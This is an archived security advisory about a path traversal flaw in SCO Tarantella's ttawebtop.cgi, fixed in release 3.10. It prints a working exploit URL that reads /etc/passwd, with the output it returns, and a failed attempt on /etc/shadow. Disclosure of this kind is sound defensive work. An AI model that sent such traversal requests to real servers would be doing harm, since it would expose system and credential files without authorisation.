Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: twt~1.htm

ttawebtop.cgi read arbitrary files



Vulnerability

    ttawebtop.cgi

Affected

    Tarantella prior to 3.10

Description

    SCO Tarantella Remote can make You read files via web:

        http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

        root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:
        daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm:
        lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
        shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
        halt:x:7:0:halt:/sbin:/sbin/
        ...

    No perms to shadow...

        http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

        File missing
        The following file could not be found:
        /tarantella/../../../../../../../../../../../../../../../etc/shadow

    It is a problem for releases 3.00 and 3.01 only.

Solution

    This problem was introduced in release 3.01 and was caught  during
    a security audit  and was fixed  for our last  release (Tarantella
    3.10).


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH